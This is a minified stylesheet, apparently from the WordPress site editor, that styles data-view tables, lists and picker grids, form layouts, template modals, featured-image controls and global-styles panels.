.dataviews-view-list .dataviews-view-list__field-wrapper{ flex-grow:1; min-height:52px; } .dataviews-view-list .dataviews-view-list__fields{ color:#757575; display:flex; flex-wrap:wrap; font-size:12px; gap:12px; row-gap:4px; } .dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field:has(.dataviews-view-list__field-value:empty),.dataviews-view-list .dataviews-view-list__fields:empty{ display:none; } .dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field-value{ align-items:center; display:flex; line-height:20px; min-height:24px; } .dataviews-view-list+.dataviews-pagination{ justify-content:space-between; } .dataviews-view-list__group-header{ color:#1e1e1e; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 24px; } .dataviews-view-table{ border-collapse:collapse; border-color:inherit; color:#757575; margin-bottom:auto; position:relative; text-indent:0; width:100%; } .dataviews-view-table th{ color:#1e1e1e; font-size:13px; font-weight:400; text-align:left; } .dataviews-view-table td,.dataviews-view-table th{ padding:12px; } .dataviews-view-table td.dataviews-view-table__actions-column,.dataviews-view-table th.dataviews-view-table__actions-column{ text-align:right; } .dataviews-view-table td.dataviews-view-table__actions-column--sticky,.dataviews-view-table th.dataviews-view-table__actions-column--sticky{ background-color:#fff; position:sticky; right:0; } .dataviews-view-table td.dataviews-view-table__actions-column--stuck:after,.dataviews-view-table th.dataviews-view-table__actions-column--stuck:after{ background-color:#f0f0f0; bottom:0; content:""; display:block; left:0; position:absolute; top:0; width:1px; } .dataviews-view-table td.dataviews-view-table__checkbox-column,.dataviews-view-table th.dataviews-view-table__checkbox-column{ padding-right:0; } .dataviews-view-table td.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper,.dataviews-view-table th.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper{ max-width:auto; min-width:auto; } .dataviews-view-table tr{ border-top:1px solid #f0f0f0; } .dataviews-view-table tr .dataviews-view-table-header-button{ gap:4px; } .dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{ padding-left:48px; } .dataviews-view-table tr td:first-child .dataviews-view-table-header-button,.dataviews-view-table tr th:first-child .dataviews-view-table-header-button{ margin-left:-8px; } .dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{ padding-right:48px; } .dataviews-view-table tr:last-child{ border-bottom:0; } .dataviews-view-table tr.is-hovered,.dataviews-view-table tr.is-hovered .dataviews-view-table__actions-column--sticky{ background-color:#f8f8f8; } .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input{ opacity:0; } .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:checked,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:focus,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:indeterminate{ opacity:1; } .dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:0; } .dataviews-view-table tr.is-hovered .components-checkbox-control__input,.dataviews-view-table tr.is-hovered .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:focus-within .components-checkbox-control__input,.dataviews-view-table tr:focus-within .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:hover .components-checkbox-control__input,.dataviews-view-table tr:hover .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:1; } @media (hover:none){ .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input,.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:1; } } .dataviews-view-table tr.is-selected{ background-color:rgba(var(--wp-admin-theme-color--rgb), .04); color:#757575; } .dataviews-view-table tr.is-selected,.dataviews-view-table tr.is-selected+tr{ border-top:1px solid rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-view-table tr.is-selected:hover{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-table tr.is-selected .dataviews-view-table__actions-column--sticky{ background-color:color-mix(in srgb, rgb(var(--wp-admin-theme-color--rgb)) 4%, #fff); } .dataviews-view-table tr.is-selected:hover .dataviews-view-table__actions-column--sticky{ background-color:color-mix(in srgb, rgb(var(--wp-admin-theme-color--rgb)) 8%, #fff); } .dataviews-view-table thead{ inset-block-start:0; position:sticky; z-index:1; } .dataviews-view-table thead tr{ border:0; } .dataviews-view-table thead tr .components-checkbox-control__input.components-checkbox-control__input{ opacity:1; } .dataviews-view-table thead th{ background-color:#fff; font-size:11px; font-weight:500; padding-bottom:8px; padding-left:12px; padding-top:8px; text-transform:uppercase; } .dataviews-view-table thead th:has(.dataviews-view-table-header-button):not(:first-child){ padding-left:4px; } .dataviews-view-table tbody td{ vertical-align:top; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper{ align-items:center; display:flex; min-height:32px; white-space:nowrap; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-end{ justify-content:flex-end; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-center{ justify-content:center; } .dataviews-view-table tbody .components-v-stack>.dataviews-view-table__cell-content-wrapper:not(:first-child){ min-height:0; } .dataviews-view-table .dataviews-view-table-header-button{ font-size:11px; font-weight:500; padding:4px 8px; text-transform:uppercase; } .dataviews-view-table .dataviews-view-table-header-button:not(:hover){ color:#1e1e1e; } .dataviews-view-table .dataviews-view-table-header-button span{ speak:none; } .dataviews-view-table .dataviews-view-table-header-button span:empty{ display:none; } .dataviews-view-table .dataviews-view-table-header{ padding-left:4px; } .dataviews-view-table .dataviews-view-table__actions-column{ white-space:nowrap; width:auto; } .dataviews-view-table:has(tr.is-selected) .components-checkbox-control__input{ opacity:1; } .dataviews-view-table.has-compact-density thead th:has(.dataviews-view-table-header-button):not(:first-child){ padding-left:0; } .dataviews-view-table.has-compact-density td,.dataviews-view-table.has-compact-density th{ padding:4px 8px; } .dataviews-view-table.has-comfortable-density td,.dataviews-view-table.has-comfortable-density th{ padding:16px 12px; } .dataviews-view-table.has-comfortable-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-comfortable-density th.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density th.dataviews-view-table__checkbox-column{ padding-right:0; } @container (max-width: 430px){ .dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{ padding-left:24px; } .dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{ padding-right:24px; } } .dataviews-view-table-selection-checkbox{ --checkbox-input-size:24px; } @media (min-width:600px){ .dataviews-view-table-selection-checkbox{ --checkbox-input-size:16px; } } .dataviews-column-primary__media{ background-color:#fff; border-radius:4px; flex-shrink:0; max-width:60px; overflow:hidden; position:relative; } .dataviews-column-primary__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-column-primary__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; position:absolute; top:0; width:100%; } .dataviews-view-table__cell-content-wrapper:not(.dataviews-column-primary__media),.dataviews-view-table__primary-column-content:not(.dataviews-column-primary__media){ max-width:80ch; min-width:15ch; } .dataviews-view-table__group-header-row .dataviews-view-table__group-header-cell{ color:#1e1e1e; font-weight:500; padding:12px 48px; } .dataviews-view-table col[class^=dataviews-view-table__col-]:not(.dataviews-view-table__col-primary){ width:1%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card{ height:100%; justify-content:flex-start; position:relative; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-actions{ padding:8px 0 4px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field{ align-content:center; min-height:24px; overflow:hidden; text-align:start; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field--clickable{ width:fit-content; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{ color:#1e1e1e; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after,.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-view-picker-grid:focus-visible[aria-activedescendant]{ outline:none; } .dataviews-view-picker-grid:focus-visible [data-active-item=true]{ outline:2px solid var(--wp-admin-theme-color); } .dataviews-view-picker-grid .dataviews-selection-checkbox{ top:8px !important; } .dataviews-view-picker-grid .dataviews-selection-checkbox input{ pointer-events:none; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media{ aspect-ratio:1/1; background-color:#fff; border-radius:4px; position:relative; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; pointer-events:none; position:absolute; top:0; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields{ font-size:12px; line-height:16px; position:relative; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields:not(:empty){ padding:0 0 12px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field-value:not(:empty){ line-height:20px; min-height:24px; padding-top:2px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field{ align-items:center; min-height:24px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-name{ color:#757575; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:35%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:65%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field:not(:has(.dataviews-view-picker-grid__field-value:not(:empty))){ display:none; } .dataviews-view-picker-grid .dataviews-view-picker-grid__badge-fields:not(:empty){ padding-bottom:12px; } .dataviews-view-picker-grid__field-value:empty,.dataviews-view-picker-grid__field:empty{ display:none; } .dataviews-view-picker-grid__card .dataviews-selection-checkbox{ left:8px; position:absolute; top:-9999em; z-index:1; } @media (hover:none){ .dataviews-view-picker-grid__card .dataviews-selection-checkbox{ top:8px; } } .dataviews-view-picker-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:hover .dataviews-selection-checkbox{ top:8px; } .dataviews-view-picker-grid__media--clickable{ cursor:pointer; } .dataviews-view-picker-grid-group__header{ color:#1e1e1e; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 48px; } .dataviews-controls__datetime{ border:none; padding:0; } .dataviews-controls__relative-date-number,.dataviews-controls__relative-date-unit{ flex:1 1 50%; } .dataviews-controls__date input[type=date]::-webkit-calendar-picker-indicator,.dataviews-controls__date input[type=date]::-webkit-inner-spin-button{ -webkit-appearance:none; display:none; } .dataviews-controls__date-preset{ border:1px solid #ddd; } .dataviews-controls__date-preset:active{ background-color:#000; } .dataforms-layouts-panel__field{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .dataforms-layouts-panel__field-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; width:38%; } .dataforms-layouts-panel__field-label--label-position-side{ align-self:center; } .dataforms-layouts-panel__field-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .dataforms-layouts-panel__field-control .components-button{ max-width:100%; min-height:32px; text-align:left; text-wrap:balance; text-wrap:pretty; white-space:normal; } .dataforms-layouts-panel__field-control.components-button.is-link[aria-disabled=true]{ text-decoration:none; } .dataforms-layouts-panel__field-control .components-dropdown{ max-width:100%; } .dataforms-layouts-panel__field-dropdown .components-popover__content{ min-width:320px; padding:16px; } .dataforms-layouts-panel__dropdown-header{ margin-bottom:16px; } .dataforms-layouts-panel__modal-footer{ margin-top:16px; } .components-popover.components-dropdown__content.dataforms-layouts-panel__field-dropdown{ z-index:159990; } .dataforms-layouts-regular__field{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .dataforms-layouts-regular__field-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; width:38%; } .dataforms-layouts-regular__field-label--label-position-side{ align-self:center; } .dataforms-layouts-regular__field-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .dataforms-layouts-card__field-header-label{ font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:15px; font-weight:500; line-height:20px; } .dataforms-layouts-card__field{ width:100%; } .dataforms-layouts-card__field-description{ color:#757575; display:block; font-size:13px; margin-bottom:16px; } .dataforms-layouts-card__field-summary{ display:flex; flex-direction:row; gap:16px; } .dataforms-layouts-row__field-control{ width:100%; } .dataforms-layouts__wrapper{ font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; } :root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .fields-create-template-part-modal{ z-index:1000001; } .fields-create-template-part-modal__area-fieldset{ border:0; margin:0; padding:0; } .fields-create-template-part-modal__area-radio-group{ border:1px solid #949494; border-radius:2px; } .fields-create-template-part-modal__area-radio-wrapper{ align-items:center; display:grid; grid-template-columns:min-content 1fr min-content; padding:12px; position:relative; grid-gap:4px 8px; color:#1e1e1e; } .fields-create-template-part-modal__area-radio-wrapper+.fields-create-template-part-modal__area-radio-wrapper{ border-top:1px solid #949494; } .fields-create-template-part-modal__area-radio-wrapper input[type=radio]{ opacity:0; position:absolute; } .fields-create-template-part-modal__area-radio-wrapper:has(input[type=radio]:checked){ z-index:1; } .fields-create-template-part-modal__area-radio-wrapper:has(input[type=radio]:not(:checked)):hover{ color:var(--wp-admin-theme-color); } .fields-create-template-part-modal__area-radio-wrapper>:not(.fields-create-template-part-modal__area-radio-label){ pointer-events:none; } .fields-create-template-part-modal__area-radio-label:before{ content:""; inset:0; position:absolute; } input[type=radio]:not(:checked)~.fields-create-template-part-modal__area-radio-label:before{ cursor:pointer; } input[type=radio]:focus-visible~.fields-create-template-part-modal__area-radio-label:before{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:4px solid #0000; } .fields-create-template-part-modal__area-radio-checkmark,.fields-create-template-part-modal__area-radio-icon{ fill:currentColor; } input[type=radio]:not(:checked)~.fields-create-template-part-modal__area-radio-checkmark{ opacity:0; } .fields-create-template-part-modal__area-radio-description{ color:#757575; font-size:12px; grid-column:2 / 3; line-height:normal; margin:0; text-wrap:pretty; } input[type=radio]:not(:checked):hover~.fields-create-template-part-modal__area-radio-description{ color:inherit; } .fields-controls__slug{ border:0; margin:0; padding:0; } .fields-controls__slug .fields-controls__slug-external-icon{ margin-left:5ch; } .fields-controls__slug .fields-controls__slug-input input.components-input-control__input{ padding-inline-start:0 !important; } .fields-controls__slug .fields-controls__slug-help-link{ word-break:break-word; } .fields-controls__slug .fields-controls__slug-help{ display:flex; flex-direction:column; } .fields-controls__slug .fields-controls__slug-help .fields-controls__slug-help-slug{ font-weight:600; } .fields-controls__featured-image-placeholder{ background:#fff linear-gradient(-45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); border-radius:2px; box-shadow:inset 0 0 0 1px #0003; display:inline-block; padding:0; } .fields-controls__featured-image-title{ color:#1e1e1e; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:100%; } .fields-controls__featured-image-image{ align-self:center; border-radius:2px; height:100%; width:100%; } .fields-controls__featured-image-container .fields-controls__featured-image-placeholder{ margin:0; } .fields-controls__featured-image-container span{ margin-right:auto; } fieldset.fields-controls__featured-image{ border:0; margin:0; padding:0; } fieldset.fields-controls__featured-image .fields-controls__featured-image-container{ border:1px solid #ddd; border-radius:2px; cursor:pointer; padding:8px 12px; } fieldset.fields-controls__featured-image .fields-controls__featured-image-container:hover{ background-color:#f0f0f0; } fieldset.fields-controls__featured-image .fields-controls__featured-image-placeholder{ height:24px; width:24px; } fieldset.fields-controls__featured-image span{ align-self:center; text-align:start; white-space:nowrap; } fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button{ height:fit-content; padding:0; } fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button:focus,fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button:hover{ border:0; color:unset; } fieldset.fields-controls__featured-image .fields-controls__featured-image-remove-button{ place-self:end; } .dataforms-layouts-panel__field-control .fields-controls__featured-image-image,.dataforms-layouts-panel__field-control .fields-controls__featured-image-placeholder{ height:16px; width:16px; } .dataviews-view-grid__media .fields-controls__featured-image-image,.dataviews-view-grid__media .fields-controls__featured-image-placeholder,.dataviews-view-list__media-wrapper .fields-controls__featured-image-image,.dataviews-view-list__media-wrapper .fields-controls__featured-image-placeholder,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-image,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{ border-radius:4px; display:block; height:100%; width:100%; } .dataviews-view-grid__media .fields-controls__featured-image-placeholder,.dataviews-view-list__media-wrapper .fields-controls__featured-image-placeholder,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{ background:#f0f0f0; box-shadow:none; } .dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-image,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{ height:32px; width:32px; } .fields-controls__parent,.fields-controls__password,.fields-controls__template{ border:0; margin:0; padding:0; } .fields-controls__template-modal{ z-index:1000001; } .fields-controls__template-content .block-editor-block-patterns-list{ column-count:2; column-gap:24px; padding-top:2px; } @media (min-width:782px){ .fields-controls__template-content .block-editor-block-patterns-list{ column-count:3; } } @media (min-width:1280px){ .fields-controls__template-content .block-editor-block-patterns-list{ column-count:4; } } .fields-controls__template-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .fields-field__title>span:first-child{ display:block; flex-grow:0; overflow:hidden; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; } .fields-field__pattern-title span:first-child{ flex:1; } .edit-site-custom-template-modal__contents-wrapper{ height:100%; justify-content:flex-start !important; } .edit-site-custom-template-modal__contents-wrapper>*{ width:100%; } .edit-site-custom-template-modal__contents-wrapper__suggestions_list{ margin-left:-12px; margin-right:-12px; width:calc(100% + 24px); } .edit-site-custom-template-modal__contents>.components-button{ height:auto; justify-content:center; } @media (min-width:782px){ .edit-site-custom-template-modal{ width:456px; } } @media (min-width:600px){ .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list{ max-height:224px; overflow-y:auto; } } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item{ display:block; height:auto; overflow-wrap:break-word; padding:8px 12px; text-align:left; white-space:pre-wrap; width:100%; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item mark{ background:none; font-weight:700; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .04); } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover *,.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover mark{ color:var(--wp-admin-theme-color); } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:focus{ background-color:#f0f0f0; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:focus:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color) inset; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__info,.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__title{ display:block; overflow:hidden; text-overflow:ellipsis; } .edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__info{ color:#757575; word-break:break-all; } .edit-site-custom-template-modal__no-results{ border:1px solid #ccc; border-radius:2px; padding:16px; } .edit-site-custom-generic-template__modal .components-modal__header{ border-bottom:none; } .edit-site-custom-generic-template__modal .components-modal__content:before{ margin-bottom:4px; } @media (min-width:960px){ .edit-site-add-new-template__modal{ margin-top:64px; max-height:calc(100% - 128px); max-width:832px; width:calc(100% - 128px); } } .edit-site-add-new-template__modal .edit-site-add-new-template__custom-template-button svg,.edit-site-add-new-template__modal .edit-site-add-new-template__template-button svg{ fill:var(--wp-admin-theme-color); } .edit-site-add-new-template__modal .edit-site-add-new-template__custom-template-button .edit-site-add-new-template__template-name{ align-items:flex-start; flex-grow:1; } .edit-site-add-new-template__modal .edit-site-add-new-template__template-icon{ background:rgba(var(--wp-admin-theme-color--rgb), .04); border-radius:100%; max-height:40px; max-width:40px; padding:8px; } .edit-site-add-new-template__template-list__contents>.components-button,.edit-site-custom-template-modal__contents>.components-button{ border:1px solid #ddd; display:flex; flex-direction:column; justify-content:center; outline:1px solid #0000; padding:32px; } .edit-site-add-new-template__template-list__contents>.components-button span:first-child,.edit-site-custom-template-modal__contents>.components-button span:first-child{ color:#1e1e1e; } .edit-site-add-new-template__template-list__contents>.components-button span,.edit-site-custom-template-modal__contents>.components-button span{ color:#757575; } .edit-site-add-new-template__template-list__contents>.components-button:hover,.edit-site-custom-template-modal__contents>.components-button:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .04); border-color:#0000; color:var(--wp-admin-theme-color-darker-10); } .edit-site-add-new-template__template-list__contents>.components-button:hover span,.edit-site-custom-template-modal__contents>.components-button:hover span{ color:var(--wp-admin-theme-color); } .edit-site-add-new-template__template-list__contents>.components-button:focus,.edit-site-custom-template-modal__contents>.components-button:focus{ border-color:#0000; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:3px solid #0000; } .edit-site-add-new-template__template-list__contents>.components-button:focus span:first-child,.edit-site-custom-template-modal__contents>.components-button:focus span:first-child{ color:var(--wp-admin-theme-color); } .edit-site-add-new-template__template-list__contents .edit-site-add-new-template__custom-template-button,.edit-site-add-new-template__template-list__contents .edit-site-add-new-template__template-list__prompt,.edit-site-custom-template-modal__contents .edit-site-add-new-template__custom-template-button,.edit-site-custom-template-modal__contents .edit-site-add-new-template__template-list__prompt{ grid-column:1 / -1; } .edit-site-add-new-template__template-list__contents>.components-button{ align-items:flex-start; height:100%; text-align:start; } .edit-site-visual-editor__editor-canvas.is-focused{ outline:calc(var(--wp-admin-border-width-focus)*2) solid var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-2); } .edit-site-canvas-loader{ align-items:center; display:flex; height:100%; justify-content:center; left:0; opacity:0; position:absolute; top:0; width:100%; } @media not (prefers-reduced-motion){ .edit-site-canvas-loader{ animation:edit-site-canvas-loader__fade-in-animation .5s ease .2s; animation-fill-mode:forwards; } } .edit-site-canvas-loader>div{ width:160px; } @keyframes edit-site-canvas-loader__fade-in-animation{ 0%{ opacity:0; } to{ opacity:1; } } .edit-site-global-styles-preview{ align-items:center; cursor:pointer; display:flex; justify-content:center; line-height:1; } .edit-site-global-styles-preview__wrapper{ display:block; max-width:100%; width:100%; } .edit-site-typography-preview{ align-items:center; background:#f0f0f0; border-radius:2px; display:flex; justify-content:center; margin-bottom:16px; min-height:100px; overflow:hidden; } .edit-site-font-size__item{ line-break:anywhere; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .edit-site-font-size__item-value{ color:#757575; } .edit-site-global-styles-screen{ margin:12px 16px 16px; } .edit-site-global-styles-screen-typography__indicator{ align-items:center; border-radius:1px; display:flex !important; font-size:14px; height:24px; justify-content:center; width:24px; } .edit-site-global-styles-screen-typography__font-variants-count{ color:#757575; } .edit-site-global-styles-font-families__manage-fonts{ justify-content:center; } .edit-site-global-styles-screen .color-block-support-panel{ border-top:none; padding-left:0; padding-right:0; padding-top:0; row-gap:12px; } .edit-site-global-styles-header__description{ padding:0 16px; } .edit-site-block-types-search{ margin-bottom:8px; padding:0 16px; } .edit-site-global-styles-header{ margin-bottom:0 !important; } .edit-site-global-styles-subtitle{ font-size:11px !important; font-weight:500 !important; margin-bottom:0 !important; text-transform:uppercase; } .edit-site-global-styles-section-title{ color:#2f2f2f; font-weight:600; line-height:1.2; margin:0; padding:16px 16px 0; } .edit-site-global-styles-icon-with-current-color{ fill:currentColor; } .edit-site-global-styles__color-indicator-wrapper{ flex-shrink:0; height:24px; } .edit-site-global-styles__shadows-panel__options-container,.edit-site-global-styles__typography-panel__options-container{ height:24px; } .edit-site-global-styles__block-preview-panel{ border:1px solid #e0e0e0; border-radius:4px; overflow:hidden; position:relative; width:100%; } .edit-site-global-styles__shadow-preview-panel{ background-image:repeating-linear-gradient(45deg, #f5f5f5 25%, #0000 0, #0000 75%, #f5f5f5 0, #f5f5f5), repeating-linear-gradient(45deg, #f5f5f5 25%, #0000 0, #0000 75%, #f5f5f5 0, #f5f5f5); background-position:0 0, 8px 8px; background-size:16px 16px; border:1px solid #e0e0e0; border-radius:4px; height:144px; overflow:auto; } .edit-site-global-styles__shadow-preview-panel .edit-site-global-styles__shadow-preview-block{ background-color:#fff; border:1px solid #e0e0e0; border-radius:2px; height:60px; width:60%; } .edit-site-global-styles__shadow-editor__dropdown-content{ width:280px; } .edit-site-global-styles__shadow-editor-panel{ margin-bottom:4px; } .edit-site-global-styles__shadow-editor__dropdown{ position:relative; width:100%; } .edit-site-global-styles__shadow-editor__dropdown-toggle{ border-radius:inherit; height:auto; padding-bottom:8px; padding-top:8px; text-align:left; width:100%; } .edit-site-global-styles__shadow-editor__dropdown-toggle.is-open{ background:#f0f0f0; color:var(--wp-admin-theme-color); } .edit-site-global-styles__shadow-editor__remove-button{ opacity:0; position:absolute; right:8px; top:8px; } .edit-site-global-styles__shadow-editor__remove-button.edit-site-global-styles__shadow-editor__remove-button{ border:none; } .edit-site-global-styles__shadow-editor__dropdown-toggle:hover+.edit-site-global-styles__shadow-editor__remove-button,.edit-site-global-styles__shadow-editor__remove-button:focus,.edit-site-global-styles__shadow-editor__remove-button:hover{ opacity:1; } @media (hover:none){ .edit-site-global-styles__shadow-editor__remove-button{ opacity:1; } } .edit-site-global-styles-screen-css{ display:flex; flex:1 1 auto; flex-direction:column; margin:16px; } .edit-site-global-styles-screen-css .components-v-stack{ flex:1 1 auto; } .edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input,.edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input .components-base-control__field{ display:flex; flex:1 1 auto; flex-direction:column; } .edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input .components-base-control__field .components-textarea-control__input{ direction:ltr; flex:1 1 auto; } .edit-site-global-styles-screen-css-help-link{ display:inline-block; margin-top:8px; } .edit-site-global-styles-screen-variations{ border-top:1px solid #ddd; margin-top:16px; } .edit-site-global-styles-screen-variations>*{ margin:24px 16px; } .edit-site-global-styles-sidebar__navigator-provider{ height:100%; } .edit-site-global-styles-sidebar__navigator-screen{ display:flex; flex-direction:column; height:100%; } .edit-site-global-styles-sidebar__navigator-screen .single-column{ grid-column:span 1; } .edit-site-global-styles-screen-root.edit-site-global-styles-screen-root,.edit-site-global-styles-screen-style-variations.edit-site-global-styles-screen-style-variations{ background:unset; color:inherit; } .edit-site-global-styles-sidebar__panel .block-editor-block-icon svg{ fill:currentColor; } .edit-site-global-styles-screen-root__active-style-tile.edit-site-global-styles-screen-root__active-style-tile,.edit-site-global-styles-screen-root__active-style-tile.edit-site-global-styles-screen-root__active-style-tile .edit-site-global-styles-screen-root__active-style-tile-preview{ border-radius:2px; } .edit-site-global-styles-screen-revisions__revisions-list{ flex-grow:1; list-style:none; margin:0 16px 16px; } .edit-site-global-styles-screen-revisions__revisions-list li{ margin-bottom:0; } .edit-site-global-styles-screen-revisions__revision-item{ cursor:pointer; display:flex; flex-direction:column; position:relative; } .edit-site-global-styles-screen-revisions__revision-item[role=option]:active,.edit-site-global-styles-screen-revisions__revision-item[role=option]:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .edit-site-global-styles-screen-revisions__revision-item:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .04); } .edit-site-global-styles-screen-revisions__revision-item:hover .edit-site-global-styles-screen-revisions__date{ color:var(--wp-admin-theme-color); } .edit-site-global-styles-screen-revisions__revision-item:after,.edit-site-global-styles-screen-revisions__revision-item:before{ content:"\a"; display:block; position:absolute; } 